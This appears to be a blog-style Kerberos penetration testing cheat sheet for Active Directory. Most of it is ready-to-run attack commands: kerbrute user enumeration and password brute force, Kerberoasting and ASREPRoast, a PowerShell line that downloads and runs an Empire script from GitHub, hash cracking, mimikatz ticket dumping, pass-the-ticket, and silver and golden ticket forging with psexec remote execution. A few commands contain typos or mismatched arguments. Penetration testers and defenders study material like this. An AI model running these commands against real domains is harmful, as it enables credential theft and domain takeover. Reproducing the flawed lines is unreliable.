Table of contents
Today I will write about Kerberos Penetration Testing, which Active Directory uses to manage authentication inside the corporate environments.
First a brief explanation about how Kerberos works and what we should know before trying to hack Kerberos.
Kerberos Introduction
Kerberos flows
Kerberos Components
KDC – Kerberos Distribution Center
Client – The client is requesting access to a service
Service – service to allow when a ticket is requested
TGT – Ticket Granting Ticket
SPN – Service Principals’ Names are associated with service accounts and they can be used to request Kerberos service tickets (TGS).
In Kerberos, if the RC4_HMAC_MD5 encryption is in use, we have an NTLM hash.
Kerberos Authentication
Tool
Description
Git
CrackMapExec
Rubeus
Metasploit
Empire
nmap
john
hashcat
kerbrute
Kerberos Penetration Testing
Enumeration
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
kerbture bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='rfs.local'-p 88
Kerberos Attacks
Brute Force Kerberos
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt
Kerberoasting
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Crack the Hashes
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
ASREPRoast
Check ASREPRoast for all domain users (credentials required).
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Pass The Ticket (PTT)
Harvest Tickets in Linux
grep default_ccache_name /etc/krb5.conf
cp tickey /tmp/tickey /tmp/tickey -i
Harvest Tickets in Windows
mimikatz # sekurlsa::tickets /export
.\Rubeus dump
Convert Tickets
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
Overpass The Hash/Pass The Key (PTK)
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python getTGT.py <domain_name>/<user_name>:[password]
export KRB5CCNAME=<TGT_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Silver Tickets
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
export KRB5CCNAME=<TGS_ccache_file>
Execute remote command to use the TGT.
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Golder Tickets
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
export KRB5CCNAME=<TGS_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass